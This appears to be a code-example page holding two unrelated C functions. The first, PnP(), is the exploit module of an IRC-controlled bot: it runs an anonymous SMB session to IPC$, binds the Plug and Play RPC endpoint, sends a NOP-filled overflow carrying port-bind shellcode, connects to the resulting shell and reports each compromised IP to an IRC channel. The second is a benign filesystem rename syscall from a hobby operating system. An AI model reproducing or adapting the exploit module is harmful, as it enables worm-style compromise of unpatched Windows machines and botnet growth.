 * Walks an anonymous SMB session to \\<ip>\IPC$, opens the browser pipe,
 * binds the PnP endpoint, then sends a fixed 2196-byte RPC request whose
 * body is NOP-filled and carries 'bindshell' (a port-bind payload), and
 * finally reports the outcome to 'target' through 'irc'.
 *
 * Returns FALSE on any network failure before the crafted packet is sent;
 * TRUE afterwards whether or not the shell connected.
 *
 * NOTE(review): the socket is never closed on any path; 'Target' is read
 * by the switch below but only assigned on the WINNT/WINXP/WIN2K branches
 * (uninitialised for every other fingerprint result); 'success' is
 * computed and never used because the guarding 'if' is commented out.
 */
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
	SOCKADDR_IN addr;
	int len;
	int sockfd;
	unsigned short smblen;
	char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
	IRC* irc=(IRC*)conn;
	BOOL success=FALSE;
	char* thisTarget;
	int pnpbindsize=405;	/* bytes of 'bindshell' copied into the packet (minus 1) */
	int TargetOS, Target;
	char* tOS="";

	WSADATA wsa;
	fWSAStartup(MAKEWORD(2,0), &wsa);

	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;

	/* OS fingerprint via named pipes first, SMB as fallback; only used
	 * for the report message since the 'success' gate is disabled. */
	thisTarget = exinfo.ip;
	TargetOS=FpHost(thisTarget,FP_NP);
	if (TargetOS==OS_UNKNOWN) 
		TargetOS=FpHost(thisTarget,FP_SMB);
	if (TargetOS == OS_WINNT){
		Target=OS_WINNT;
		success=FALSE;
	}else if (TargetOS==OS_WINXP){
		Target=OS_WINXP;
		success=FALSE;
	}else if (TargetOS==OS_WIN2K){
		Target=OS_WIN2K;
		success=TRUE;
	}else{
		success=FALSE;
	}

	ZeroMemory(&addr,sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = finet_addr(thisTarget);
	addr.sin_port = fhtons((unsigned short)exinfo.port);

	/* SMB negotiate + two-step anonymous session setup; each reply is
	 * accepted only if it is longer than 10 bytes and byte 9 (the NT
	 * status low byte) is zero. */
	if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
	if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
	
	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) return FALSE;

	if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
	
	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	/* TreeConnectAndX to \\<ip>\IPC$: the share name is widened in place
	 * (pointer advances strlen*2) and two length bytes in the template
	 * are patched afterwards. */
	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	/* NOTE(review): sprintf into tmp[1024] is unbounded; safe only as
	 * long as exinfo.ip is a short dotted-quad. */
	sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
	convert_name((char *)ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	/* NetBIOS session length byte (total minus the 4-byte NBSS header). */
	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	/* Open the browser pipe and bind the PnP RPC endpoint over it. */
	if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// Start prepare header -- dETOX mod --
	/* Patches 4 bytes of the file-scope RPC_call template in place with
	 * the caller-selected return address; presumably not safe if several
	 * PnP() calls run concurrently. */
	memcpy(RPC_call + 260, Offsets[OffNum], 4); 

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	/* 'bindport' is not local (file scope); it is stored XOR 0x9999 at
	 * offset 176 of the payload, which decodes it at run time. */
	unsigned short port;
    port = fhtons(bindport)^(USHORT)0x9999;
    memcpy(&bindshell[176],&port,2);
	memcpy(ptr,bindshell,pnpbindsize-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
	frecv(sockfd, recvbuf, 4096, 0);

	/* Verbose report of the fingerprint result (see note on 'Target'). */
	if (!exinfo.silent && exinfo.verbose){
		switch(Target){
		case 1:
			tOS="WINNT";
			break;
		case 2:
			tOS="WIN2K";
			break;
		case 3:
			tOS="WINXP";
			break;
		default:
			tOS="UNKNOWN/2K3/LINUX";
			break;
		}

		irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
	}


//	if(success){
		/* Give the payload time to start listening before connecting back. */
		Sleep(2000);
		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
//	}
	return TRUE;
}
Exemplo n.º 20
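/*
 * Rename (move) a_oldpath to a_newpath on the same drive.
 *
 * Both paths are split into (drive, directory, final component).  The
 * destination directory is opened first; an existing destination entry
 * is allowed only if it is writable, of the same kind (file/directory)
 * as the source and, for a directory, empty -- it is then removed.  The
 * source entry is copied under its new 8.3 name into the destination
 * directory and only afterwards deleted from the old one, so a failed
 * add leaves the source in place.
 *
 * Returns 0 on success or a negative E* code: ELONGPATH, EINVALIDNAME,
 * EDEVICE_DIFFERENT, ETARGET_EXISTS, EPATH_NOT_EXISTS, EREADONLY,
 * EOLDPATH_PARENT_OF_NEWPATH, ESRC_DEST_NOT_SAME_TYPE, or whatever
 * open_path()/add_dir_entry() returned.
 */
int syscall_rename(const char *a_oldpath, const char *a_newpath)
{
	int ohandle, nhandle;
	int drive1, drive2;
	char dir_path1[512], dir_path2[512];
	char name_comp1[13], name_comp2[13], conv_name1[11], conv_name2[11];
	char oldpath[512], newpath[512];
	struct dir_entry dent1, dent2;
	/* 1 only when find_entry() located the entry; they must be
	 * initialised because the lookups below are conditional. */
	int exist1 = 0, exist2 = 0;
	struct DIR_FILE *dirf;
	int len1, len2;
	int i,t;

	len1 = strlen(a_oldpath);
	len2 = strlen(a_newpath);

	/* The local copies hold 512 bytes including the terminator, so a
	 * 512-character path would overflow them in strcpy(). */
	if (len1 >= 512 || len2 >= 512) return ELONGPATH;
	/* An empty path has no final component (and len-1 would index
	 * before the buffer). */
	if (len1 == 0 || len2 == 0) return EINVALIDNAME;

	strcpy(oldpath,a_oldpath);
	strcpy(newpath,a_newpath);

	/* Drop one trailing separator so "dir/" parses like "dir". */
	if (oldpath[len1-1] == '/' || oldpath[len1-1] == '\\') oldpath[len1-1] = '\0';
	if (newpath[len2-1] == '/' || newpath[len2-1] == '\\') newpath[len2-1] = '\0';
	parse_path(oldpath, &drive1, dir_path1, name_comp1);
	parse_path(newpath, &drive2, dir_path2, name_comp2);

	if (drive1 != drive2) return EDEVICE_DIFFERENT;

	nhandle = open_path(drive2, dir_path2);
	if (nhandle < 0) return nhandle;

	/* The destination must name an entry: conv_name2 becomes the name
	 * of the new directory entry, so an empty component is an error
	 * rather than an uninitialised name. */
	if (name_comp2[0] == '\0' || convert_name(name_comp2, conv_name2) < 0)
	{
		close_dir(nhandle);
		return EINVALIDNAME; // Error
	}
	exist2 = find_entry(nhandle, conv_name2, &dent2);

	ohandle = open_path(drive1, dir_path1);
	if (ohandle < 0)
	{
		close_dir(nhandle);
		return ohandle;
	}
	if (name_comp1[0] != '\0')
	{
		if (convert_name(name_comp1, conv_name1) < 0)
		{
			close_dir(nhandle);
			close_dir(ohandle);
			return EINVALIDNAME; // Error
		}

		exist1 = find_entry(ohandle, conv_name1, &dent1);
	}

	// Check whether new path exists and is removable
	if ((exist2 == 1) && ((dent2.attrib & FTYPE_READONLY) || ((dent2.attrib & FTYPE_DIR) && (empty_dir(nhandle, &dent2) != 1))))
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return ETARGET_EXISTS;
	}

	// Check if source exists and is movable
	/* Also covers an empty source component (exist1 stays 0). */
	if (exist1 != 1)
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return EPATH_NOT_EXISTS;
	}
	if ((dent1.attrib & FTYPE_READONLY) != 0)
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return EREADONLY;
	}
	// Check whether oldpath is not a subpath of newpath
	/* Walk the destination directory's parent chain; hitting ohandle
	 * means the source directory would be moved into itself. */
	if ((dent1.attrib & FTYPE_DIR) && (ohandle != nhandle))
	{	
		t = nhandle;
		dirf = &dir_file_list[t];

		while (dirf->parent_index >= 0 && dirf->parent_index != ohandle)
		{
			t = dirf->parent_index;
			dirf = &dir_file_list[t];
		}
		
		if (dirf->parent_index == ohandle)
		{
			close_dir(nhandle);
			close_dir(ohandle);
			return EOLDPATH_PARENT_OF_NEWPATH;
		}
	}

	// Check if newpath already exists whether it is compatible or not
	if ((exist2 == 1) && (((dent1.attrib & FTYPE_DIR) != 0 && (dent2.attrib & FTYPE_DIR) == 0) || ((dent1.attrib & FTYPE_DIR) == 0 && (dent2.attrib & FTYPE_DIR) != 0))) 
	{
		close_dir(nhandle);
		close_dir(ohandle);
		return ESRC_DEST_NOT_SAME_TYPE;
	}

	// Remove destination entry if exists
	/* NOTE(review): the removal result is not checked; if it fails the
	 * add below presumably fails on the duplicate name and its code is
	 * what the caller sees. */
	if (exist2 == 1)
	{
		if (dent2.attrib & FTYPE_DIR)
			syscall_rmdir(newpath);
		else	syscall_unlink(newpath);
	}

	// Add the source dir entry after changing the name
	// to destination directory
	bcopy( (char *)&dent1, (char *)&dent2, sizeof(struct dir_entry));
	for (i=0; i<11; i++)	// Both name and extension
		dent2.name[i] = conv_name2[i];

	/* Add first, delete second: a failed add leaves the source intact. */
	t = add_dir_entry(nhandle, &dent2);
	if (t == 1)
	{
		delete_dir_entry(ohandle, dent1.name);
	}

	// Close the handles of parent directories
	/* NOTE(review): when ohandle == nhandle the same handle is closed
	 * twice here, as in the original -- verify close_dir() tolerates it. */
	close_dir(ohandle);
	close_dir(nhandle);
	
	if (t == 1) return 0;
	else	return t;

}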